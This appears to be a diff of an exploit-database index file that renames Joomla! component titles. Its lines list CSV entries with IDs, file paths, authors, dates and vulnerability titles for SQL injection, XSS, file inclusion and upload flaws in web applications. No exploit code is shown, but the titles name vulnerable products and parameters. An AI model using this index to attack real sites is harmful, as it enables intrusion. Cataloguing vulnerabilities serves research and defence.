35024,platforms/php/webapps/35024.txt,"Joomla! Component 'com_catalogue' - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0
35024,platforms/php/webapps/35024.txt,"Joomla! Component Catalogue - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0
34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles - /riddles/results.php searchQuery Parameter Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0
34903,platforms/php/webapps/34903.txt,"PHP Scripts Now Riddles - /riddles/list.php catid Parameter SQL Injection",2009-08-20,Moudi,php,webapps,0
34904,platforms/php/webapps/34904.txt,"Radvision Scopia - 'entry/index.jsp' Cross-Site Scripting",2009-08-24,"Francesco Bianchino",php,webapps,0
@ -33885,12 +33886,12 @@ id,file,description,date,author,platform,type,port
35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro - 'showflat.pl' Cross-Site Scripting",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0
35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 - (stable) 'admin1.template.php' Local File Inclusion / Remote File Inclusion",2010-12-09,"Marcin Ressel",php,webapps,0
35088,platforms/php/webapps/35088.txt,"PHP State - 'id' Parameter SQL Injection",2010-12-09,jos_ali_joe,php,webapps,0
35089,platforms/php/webapps/35089.txt,"Joomla! Component 'com_jeformcr' - 'id' Parameter SQL Injection",2010-12-09,FL0RiX,php,webapps,0
35090,platforms/php/webapps/35090.txt,"Joomla! Component 'com_jesectionfinder' - 'sf_id' Parameter SQL Injection",2010-12-10,FL0RiX,php,webapps,0
35089,platforms/php/webapps/35089.txt,"Joomla! Component Jeformcr - 'id' Parameter SQL Injection",2010-12-09,FL0RiX,php,webapps,0
35090,platforms/php/webapps/35090.txt,"Joomla! Component JExtensions Property Finder - 'sf_id' Parameter SQL Injection",2010-12-10,FL0RiX,php,webapps,0
35091,platforms/php/webapps/35091.txt,"ManageEngine EventLog Analyzer 6.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,"Rob Kraus",php,webapps,0
35093,platforms/cgi/webapps/35093.txt,"BizDir 05.10 - 'f_srch' Parameter Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",cgi,webapps,0
35094,platforms/php/webapps/35094.txt,"slickMsg 0.7-alpha - 'top.php' Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
35096,platforms/php/webapps/35096.txt,"Joomla! Component 'com_mailto' - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0
35096,platforms/php/webapps/35096.txt,"Joomla! Component com_mailto - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0
35097,platforms/php/webapps/35097.txt,"Joomla! Component 'com_redirect' 1.5.19 - Local File Inclusion",2010-12-13,jos_ali_joe,php,webapps,0
35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80
35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80
@ -33921,7 +33922,7 @@ id,file,description,date,author,platform,type,port
35131,platforms/php/webapps/35131.txt,"Social Share - 'Username' Parameter SQL Injection",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0
35133,platforms/php/webapps/35133.txt,"WordPress Plugin Mediatricks Viva Thumbs - Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0
35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x - 'quicksearch_ContentContent' Parameter HTML Injection",2010-12-21,"High-Tech Bridge SA",php,webapps,0
35135,platforms/php/webapps/35135.txt,"Joomla! Component 'com_classified' - SQL Injection",2010-12-22,R4dc0re,php,webapps,0
35135,platforms/php/webapps/35135.txt,"Joomla! Component Classified - SQL Injection",2010-12-22,R4dc0re,php,webapps,0
35136,platforms/php/webapps/35136.txt,"WordPress Plugin Accept Signups 0.1 - 'email' Parameter Cross-Site Scripting",2010-12-22,clshack,php,webapps,0
35137,platforms/php/webapps/35137.txt,"Social Share - 'vote.php' HTTP Response Splitting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
35138,platforms/php/webapps/35138.txt,"Esotalk CMS 1.0.0g4 - Cross-Site Scripting",2014-11-02,evi1m0,php,webapps,0
@ -33960,7 +33961,7 @@ id,file,description,date,author,platform,type,port
35208,platforms/hardware/webapps/35208.txt,"Barracuda - Multiple Anauthentificated Logfile Download",2014-11-10,4CKnowLedge,hardware,webapps,0
35292,platforms/php/webapps/35292.html,"vBSEO 3.2.2/3.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-30,MaXe,php,webapps,0
35291,platforms/php/webapps/35291.txt,"Vanilla Forums 2.0.16 - 'Target' Parameter Cross-Site Scripting",2011-01-27,"YGN Ethical Hacker Group",php,webapps,0
35295,platforms/php/webapps/35295.txt,"Joomla! Component 'com_frontenduseraccess' - Local File Inclusion",2011-02-01,wishnusakti,php,webapps,0
35295,platforms/php/webapps/35295.txt,"Joomla! Component com_frontenduseraccess - Local File Inclusion",2011-02-01,wishnusakti,php,webapps,0
35296,platforms/php/webapps/35296.txt,"eSyndiCat Directory Software 2.2/2.3 - 'preview' Parameter Cross-Site Scripting",2011-01-30,"Avram Marius",php,webapps,0
35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0
35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 - Cross-Site Scripting / Local File Inclusion",2011-02-01,"Yam Mesicka",php,webapps,0
@ -34010,7 +34011,7 @@ id,file,description,date,author,platform,type,port
35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass (2)",2014-11-17,"Project Zero Labs",hardware,webapps,80
35277,platforms/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80
35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80
35294,platforms/php/webapps/35294.txt,"Joomla! Component 'com_clan_members' - 'id' Parameter SQL Injection",2011-02-01,FL0RiX,php,webapps,0
35294,platforms/php/webapps/35294.txt,"Joomla! Component com_clan_members - 'id' Parameter SQL Injection",2011-02-01,FL0RiX,php,webapps,0
35300,platforms/php/webapps/35300.txt,"WordPress Plugin TagNinja 1.0 - 'id' Parameter Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0
35301,platforms/php/webapps/35301.html,"Snowfox CMS 1.0 - Cross-Site Request Forgery (Add Admin)",2014-11-19,LiquidWorm,php,webapps,80
35303,platforms/php/webapps/35303.txt,"WordPress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal",2014-11-19,"Kacper Szurek",php,webapps,80
@ -34212,7 +34213,7 @@ id,file,description,date,author,platform,type,port
35625,platforms/php/webapps/35625.txt,"PMB 4.1.3 - Authenticated SQL Injection",2014-12-27,"xd4rker dark",php,webapps,0
35626,platforms/php/webapps/35626.txt,"Easy File Sharing WebServer 6.8 - Persistent Cross-Site Scripting",2014-12-27,"Sick Psycko",php,webapps,0
35629,platforms/php/webapps/35629.txt,"ChillyCMS 1.2.1 - Multiple Remote File Inclusion",2011-04-16,KedAns-Dz,php,webapps,0
35630,platforms/php/webapps/35630.txt,"Joomla! Component 'com_phocadownload' - Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0
35630,platforms/php/webapps/35630.txt,"Joomla! Component com_phocadownload - Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0
35631,platforms/php/webapps/35631.txt,"CRESUS - 'recette_detail.php' SQL Injection",2011-04-19,"GrayHatz Security Group",php,webapps,0
35632,platforms/php/webapps/35632.txt,"XOOPS 2.5 - 'imagemanager.php' Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0
35633,platforms/php/webapps/35633.txt,"Ultra Marketing Enterprises CMS and Cart - Multiple SQL Injections",2011-04-19,eXeSoul,php,webapps,0
@ -34281,7 +34282,7 @@ id,file,description,date,author,platform,type,port
35737,platforms/php/webapps/35737.txt,"Calendarix 0.8.20080808 - Multiple Cross-Site Scripting / SQL Injection",2011-05-10,"High-Tech Bridge SA",php,webapps,0
35739,platforms/php/webapps/35739.txt,"Argyle Social - Multiple Cross-Site Scripting Vulnerabilities",2011-05-12,"High-Tech Bridge SA",php,webapps,0
35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin - 'tagcloud' Parameter Cross-Site Scripting",2011-05-13,MustLive,multiple,webapps,0
35745,platforms/php/webapps/35745.txt,"Joomla! Component 'com_cbcontact' - 'contact_id' Parameter SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0
35745,platforms/php/webapps/35745.txt,"Joomla! Component com_cbcontact - 'contact_id' Parameter SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0
35747,platforms/hardware/webapps/35747.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit Wlsecrefresh.wl & Wlsecurity.wl",2015-01-11,"XLabs Security",hardware,webapps,0
35758,platforms/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps,0
35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit DnsProxy.cmd",2015-01-11,"XLabs Security",hardware,webapps,0
@ -34303,7 +34304,7 @@ id,file,description,date,author,platform,type,port
35782,platforms/php/webapps/35782.txt,"Room Juice 0.3.3 - 'display.php' Cross-Site Scripting",2011-05-19,"AutoSec Tools",php,webapps,0
35783,platforms/php/webapps/35783.html,"Andy's PHP KnowledgeBase 0.95.4 - 'step5.php' Remote PHP Code Execution",2011-05-19,"AutoSec Tools",php,webapps,0
35787,platforms/php/webapps/35787.txt,"LimeSurvey 1.85+ - 'admin.php' Cross-Site Scripting",2011-05-19,"Juan Manuel Garcia",php,webapps,0
35788,platforms/php/webapps/35788.txt,"Joomla! Component 'com_maplocator' - 'cid' Parameter SQL Injection",2011-05-23,FL0RiX,php,webapps,0
35788,platforms/php/webapps/35788.txt,"Joomla! Component Map Locator - 'cid' Parameter SQL Injection",2011-05-23,FL0RiX,php,webapps,0
35789,platforms/php/webapps/35789.txt,"phpScheduleIt 1.2.12 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-24,"High-Tech Bridge SA",php,webapps,0
35791,platforms/php/webapps/35791.txt,"Ajax Chat 1.0 - 'ajax-chat.php' Cross-Site Scripting",2011-05-24,"High-Tech Bridge SA",php,webapps,0
35803,platforms/php/webapps/35803.txt,"Cotonti 0.9.2 - Multiple SQL Injections",2011-05-30,KedAns-Dz,php,webapps,0
@ -34322,7 +34323,7 @@ id,file,description,date,author,platform,type,port
35985,platforms/php/webapps/35985.txt,"Support Incident Tracker (SiT!) 3.63 p1 - report_marketing.php exc[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
35986,platforms/php/webapps/35986.txt,"Support Incident Tracker (SiT!) 3.63 p1 - billable_incidents.php sites[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
35984,platforms/php/webapps/35984.txt,"Joomla! Component 'com_virtualmoney' 1.5 - SQL Injection",2011-07-25,FL0RiX,php,webapps,0
35826,platforms/php/webapps/35826.txt,"Joomla! Component 'com_ccboard' - SQL Injection / Arbitrary File Upload",2011-06-06,KedAns-Dz,php,webapps,0
35826,platforms/php/webapps/35826.txt,"Joomla! Component CCBoard - SQL Injection / Arbitrary File Upload",2011-06-06,KedAns-Dz,php,webapps,0
35829,platforms/php/webapps/35829.txt,"Nakid CMS 1.0.2 - 'CKEditorFuncNum' Parameter Cross-Site Scripting",2011-06-06,"AutoSec Tools",php,webapps,0
35830,platforms/php/webapps/35830.txt,"Multiple WordPress WooThemes Themes - 'test.php' Cross-Site Scripting",2011-06-06,MustLive,php,webapps,0
35831,platforms/php/webapps/35831.txt,"PopScript - 'index.php' Multiple Input Validation Vulnerabilities",2011-06-06,NassRawI,php,webapps,0
@ -34357,7 +34358,7 @@ id,file,description,date,author,platform,type,port
35878,platforms/php/webapps/35878.txt,"ecommerceMajor - SQL Injection / Authentication Bypass",2015-01-22,"Manish Tanwar",php,webapps,0
35879,platforms/php/webapps/35879.txt,"WordPress Plugin Cforms 14.7 - Remote Code Execution",2015-01-19,Zakhar,php,webapps,0
35882,platforms/php/webapps/35882.txt,"Nodesforum - '_nodesforum_node' Parameter SQL Injection",2011-06-23,"Andrea Bocchetti",php,webapps,0
35883,platforms/php/webapps/35883.txt,"Joomla! Component 'com_morfeoshow' - 'idm' Parameter SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0
35883,platforms/php/webapps/35883.txt,"Joomla! Component com_morfeoshow - 'idm' Parameter SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0
35884,platforms/php/webapps/35884.txt,"Mambo 4.6.x - Multiple Cross-Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0
35890,platforms/jsp/webapps/35890.txt,"ManageEngine ServiceDesk Plus 9.0 - SQL Injection",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,0
35891,platforms/jsp/webapps/35891.txt,"ManageEngine ServiceDesk Plus 9.0 - User Enumeration",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,8080
@ -34381,7 +34382,7 @@ id,file,description,date,author,platform,type,port
35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",php,webapps,80
35915,platforms/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",multiple,webapps,0
35916,platforms/php/webapps/35916.txt,"WordPress Plugin Photo Gallery 1.2.5 - Unrestricted Arbitrary File Upload",2014-11-11,"Kacper Szurek",php,webapps,80
35922,platforms/php/webapps/35922.txt,"Joomla! Component 'com_jr_tfb' - 'Controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0
35922,platforms/php/webapps/35922.txt,"Joomla! Component com_jr_tfb - 'Controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0
35923,platforms/asp/webapps/35923.txt,"Paliz Portal - Cross-Site Scripting / Multiple SQL Injection",2011-07-02,Net.Edit0r,asp,webapps,0
35926,platforms/asp/webapps/35926.txt,"eTAWASOL - 'id' Parameter SQL Injection",2011-07-03,Bl4ck.Viper,asp,webapps,0
35927,platforms/php/webapps/35927.txt,"Classified Script - c-BrowseClassified URL Cross-Site Scripting",2011-07-05,"Raghavendra Karthik D",php,webapps,0
@ -34400,12 +34401,12 @@ id,file,description,date,author,platform,type,port
35950,platforms/php/webapps/35950.txt,"NPDS CMS REvolution-13 - SQL Injection",2015-01-24,"Narendra Bhati",php,webapps,80
35954,platforms/php/webapps/35954.txt,"Auto Web Toolbox - 'id' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
35955,platforms/php/webapps/35955.txt,"Easy Estate Rental - 's_location' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
35956,platforms/php/webapps/35956.txt,"Joomla! Component 'com_foto' - 'id_categoria' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
35958,platforms/php/webapps/35958.txt,"Joomla! Component 'com_juicy' - 'picId' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
35959,platforms/php/webapps/35959.txt,"Joomla! Component 'com_hospital' - SQL Injection",2011-07-15,SOLVER,php,webapps,0
35960,platforms/php/webapps/35960.txt,"Joomla! Component 'com_controller' - 'Itemid' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
35956,platforms/php/webapps/35956.txt,"Joomla! Component Foto - 'id_categoria' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
35958,platforms/php/webapps/35958.txt,"Joomla! Component Juicy Gallery - 'picId' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
35959,platforms/php/webapps/35959.txt,"Joomla! Component com_hospital - SQL Injection",2011-07-15,SOLVER,php,webapps,0
35960,platforms/php/webapps/35960.txt,"Joomla! Component Controller - 'Itemid' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
35987,platforms/php/webapps/35987.txt,"Support Incident Tracker (SiT!) 3.63 p1 - search.php search_string Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
35966,platforms/php/webapps/35966.txt,"Joomla! Component 'com_newssearch' - SQL Injection",2011-07-15,"Robert Cooper",php,webapps,0
35966,platforms/php/webapps/35966.txt,"Joomla! Component com_newssearch - SQL Injection",2011-07-15,"Robert Cooper",php,webapps,0
35967,platforms/php/webapps/35967.txt,"AJ Classifieds - 'listingid' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products - Multiple SQL Injections",2011-07-18,Lazmania61,php,webapps,0
35969,platforms/php/webapps/35969.txt,"BlueSoft Social Networking CMS - SQL Injection",2011-07-17,Lazmania61,php,webapps,0
@ -34429,7 +34430,7 @@ id,file,description,date,author,platform,type,port
36010,platforms/asp/webapps/36010.txt,"BESNI OKUL PORTAL - 'sayfa.asp' Cross-Site Scripting",2011-08-03,Err0R,asp,webapps,0
36011,platforms/asp/webapps/36011.txt,"Ataccan E-Ticaret Scripti - 'id' Parameter SQL Injection",2011-08-03,Err0R,asp,webapps,0
36012,platforms/php/webapps/36012.txt,"Joomla! Component 'com_xeslidegalfx' - 'id' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0
36015,platforms/php/webapps/36015.txt,"Joomla! Component 'com_community' - 'userid' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0
36015,platforms/php/webapps/36015.txt,"Joomla! Component com_community - 'userid' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0
36017,platforms/php/webapps/36017.txt,"HESK 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0
36018,platforms/php/webapps/36018.txt,"WordPress Plugin WP E-Commerce 3.8.6 - 'cart_messages[]' Parameter Cross-Site Scripting",2011-08-04,"High-Tech Bridge SA",php,webapps,0
36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 - 'TagSelector.aspx' Cross-Site Scripting",2011-08-04,PontoSec,asp,webapps,0
@ -34543,7 +34544,7 @@ id,file,description,date,author,platform,type,port
36166,platforms/php/webapps/36166.txt,"WordPress Plugin BuddyPress 1.2.10 / WordPress Theme DEV Blogs Mu 1.2.6 (WordPress 3.1.4) - Regular Subscriber HTML Injection",2011-09-26,knull,php,webapps,0
36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure",2011-09-26,"Stefan Schurtz",php,webapps,0
36168,platforms/php/webapps/36168.txt,"S9Y Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0
36171,platforms/php/webapps/36171.txt,"Joomla! Component 'com_biitatemplateshop' - 'groups' Parameter SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0
36171,platforms/php/webapps/36171.txt,"Joomla! Component Biitatemplateshop - 'groups' Parameter SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0
36172,platforms/cfm/webapps/36172.txt,"Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps,0
36173,platforms/php/webapps/36173.txt,"Vanira CMS - 'vtpidshow' Parameter SQL Injection",2011-09-27,"kurdish hackers team",php,webapps,0
36175,platforms/php/webapps/36175.txt,"Traq 2.2 - Multiple SQL Injections / Cross-Site Scripting",2011-09-28,"High-Tech Bridge SA",php,webapps,0
@ -34577,10 +34578,10 @@ id,file,description,date,author,platform,type,port
36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0
36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 - 'mod' Parameter Cross-Site Scripting",2011-10-06,"Stefan Schurtz",php,webapps,0
36214,platforms/php/webapps/36214.txt,"BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,cr4wl3r,php,webapps,0
36215,platforms/php/webapps/36215.txt,"Joomla! Component 'com_expedition' - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0
36215,platforms/php/webapps/36215.txt,"Joomla! Component com_expedition - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0
36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 - Multiple Remote File Inclusion",2011-10-10,indoushka,php,webapps,0
36220,platforms/php/webapps/36220.txt,"Joomla! Component 'com_tree' - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
36221,platforms/php/webapps/36221.txt,"Joomla! Component 'com_br' - 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
36221,platforms/php/webapps/36221.txt,"Joomla! Component com_br - 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
36222,platforms/php/webapps/36222.txt,"Joomla! Component 'com_shop' - 'id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
36223,platforms/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Inclusion",2011-10-11,indoushka,php,webapps,0
36224,platforms/php/webapps/36224.txt,"6KBBS 8.0 build 20101201 - Cross-Site Scripting / Information Disclosure",2011-10-10,"labs insight",php,webapps,0
@ -34744,7 +34745,7 @@ id,file,description,date,author,platform,type,port
36469,platforms/php/webapps/36469.txt,"Joomla! Component 'com_tsonymf' - 'idofitem' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0
36470,platforms/php/webapps/36470.txt,"Tiki Wiki CMS Groupware 8.1 - 'show_errors' Parameter HTML Injection",2011-12-20,"Stefan Schurtz",php,webapps,0
36471,platforms/php/webapps/36471.txt,"PHPShop CMS 3.4 - Multiple Cross-Site Scripting / SQL Injection",2011-12-20,"High-Tech Bridge SA",php,webapps,0
36472,platforms/php/webapps/36472.txt,"Joomla! Component 'com_caproductprices' - 'id' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0
36472,platforms/php/webapps/36472.txt,"Joomla! Component com_caproductprices - 'id' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0
36473,platforms/php/webapps/36473.txt,"Cyberoam UTM 10 - 'tableid' Parameter SQL Injection",2011-12-20,"Benjamin Kunz Mejri",php,webapps,0
36474,platforms/php/webapps/36474.txt,"epesi BIM 1.2 rev 8154 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-21,"High-Tech Bridge SA",php,webapps,0
36478,platforms/php/webapps/36478.php,"WordPress Plugin InBoundio Marketing 1.0 - Arbitrary File Upload",2015-03-24,KedAns-Dz,php,webapps,0
@ -34817,15 +34818,15 @@ id,file,description,date,author,platform,type,port
36585,platforms/asp/webapps/36585.txt,"Snitz Forums 2000 - 'TOPIC_ID' Parameter SQL Injection",2012-01-20,snup,asp,webapps,0
36586,platforms/php/webapps/36586.txt,"Syneto Unified Threat Management 1.3.3/1.4.2 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-01-20,"Alexander Fuchs",php,webapps,0
36588,platforms/asp/webapps/36588.txt,"Acidcat ASP CMS 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-21,"Avram Marius",asp,webapps,0
36589,platforms/php/webapps/36589.txt,"Joomla! Component 'com_br' - 'Controller' Parameter Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps,0
36589,platforms/php/webapps/36589.txt,"Joomla! Component com_br - 'Controller' Parameter Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps,0
36590,platforms/php/webapps/36590.txt,"Tribiq CMS - 'index.php' SQL Injection",2012-01-21,"Skote Vahshat",php,webapps,0
36591,platforms/php/webapps/36591.txt,"Joomla! Component 'com_full' - 'id' Parameter SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps,0
36591,platforms/php/webapps/36591.txt,"Joomla! Component Full - 'id' Parameter SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps,0
36592,platforms/php/webapps/36592.txt,"Joomla! Component Vik Real Estate 1.0 - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0
36593,platforms/php/webapps/36593.txt,"Joomla! Component 'com_xball' - 'team_id' Parameter SQL Injection",2012-01-23,CoBRa_21,php,webapps,0
36594,platforms/php/webapps/36594.txt,"Joomla! Component 'com_boss' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
36595,platforms/php/webapps/36595.txt,"Joomla! Component 'com_car' - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0
36594,platforms/php/webapps/36594.txt,"Joomla! Component com_boss - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
36595,platforms/php/webapps/36595.txt,"Joomla! Component com_car - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0
36596,platforms/php/webapps/36596.txt,"Joomla! Component 'com_some' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
36597,platforms/php/webapps/36597.txt,"Joomla! Component 'com_bulkenquery' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
36597,platforms/php/webapps/36597.txt,"Joomla! Component com_bulkenquery - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
36598,platforms/php/webapps/36598.txt,"Joomla! Component com_kp - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
36599,platforms/asp/webapps/36599.txt,"Raven 1.0 - 'connector.asp' Arbitrary File Upload",2012-01-21,HELLBOY,asp,webapps,0
36600,platforms/php/webapps/36600.txt,"WordPress Plugin Business Intelligence - SQL Injection (Metasploit)",2015-04-02,"Jagriti Sahu",php,webapps,80
@ -34844,18 +34845,18 @@ id,file,description,date,author,platform,type,port
36619,platforms/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps,0
36621,platforms/php/webapps/36621.txt,"glFusion 1.x - SQL Injection",2012-01-24,KedAns-Dz,php,webapps,0
36623,platforms/php/webapps/36623.txt,"Ultimate Locator - 'radius' Parameter SQL Injection",2012-01-24,"Robert Cooper",php,webapps,0
36624,platforms/php/webapps/36624.txt,"Joomla! Component 'com_jesubmit' - 'index.php' Arbitrary File Upload",2012-01-24,"Robert Cooper",php,webapps,0
36624,platforms/php/webapps/36624.txt,"Joomla! Component JE Story Submit - 'index.php' Arbitrary File Upload",2012-01-24,"Robert Cooper",php,webapps,0
36625,platforms/php/webapps/36625.txt,"OSClass 2.3.3 - 'index.php' sCategory Parameter SQL Injection",2012-01-25,"High-Tech Bridge SA",php,webapps,0
36626,platforms/php/webapps/36626.txt,"OSClass 2.3.3 - 'index.php' getParam() Function Multiple Parameter Cross-Site Scripting",2012-01-25,"High-Tech Bridge SA",php,webapps,0
36627,platforms/php/webapps/36627.txt,"DClassifieds 0.1 final - Cross-Site Request Forgery",2012-01-25,"High-Tech Bridge SA",php,webapps,0
36628,platforms/php/webapps/36628.txt,"vBadvanced CMPS 3.2.2 - 'vba_cmps_include_bottom.php' Remote File Inclusion",2012-01-25,PacketiK,php,webapps,0
36629,platforms/php/webapps/36629.txt,"Joomla! Component 'com_motor' - 'cid' Parameter SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0
36629,platforms/php/webapps/36629.txt,"Joomla! Component com_motor - 'cid' Parameter SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0
36630,platforms/php/webapps/36630.txt,"Joomla! Component 'com_products' - Multiple SQL Injections",2012-01-26,the_cyber_nuxbie,php,webapps,0
36631,platforms/php/webapps/36631.txt,"WordPress Plugin Slideshow Gallery 1.1.x - 'border' Parameter Cross-Site Scripting",2012-01-26,"Bret Hawk",php,webapps,0
36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x - 'shopping_url' Parameter Cross-Site Scripting",2012-01-26,sonyy,php,webapps,0
36634,platforms/php/webapps/36634.txt,"Joomla! Component 'com_visa' - Local File Inclusion / SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0
36635,platforms/php/webapps/36635.txt,"Joomla! Component 'com_firmy' - 'Id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0
36638,platforms/php/webapps/36638.txt,"Joomla! Component 'com_crhotels' - 'catid' Parameter SQL Injection",2012-01-31,the_cyber_nuxbie,php,webapps,0
36635,platforms/php/webapps/36635.txt,"Joomla! Component com_firmy - 'Id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0
36638,platforms/php/webapps/36638.txt,"Joomla! Component com_crhotels - 'catid' Parameter SQL Injection",2012-01-31,the_cyber_nuxbie,php,webapps,0
36639,platforms/php/webapps/36639.txt,"Joomla! Component 'com_propertylab' - 'id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0
36640,platforms/php/webapps/36640.txt,"WordPress Plugin Work The Flow File Upload 2.5.2 - Arbitrary File Upload",2015-04-05,"Claudio Viviani",php,webapps,0
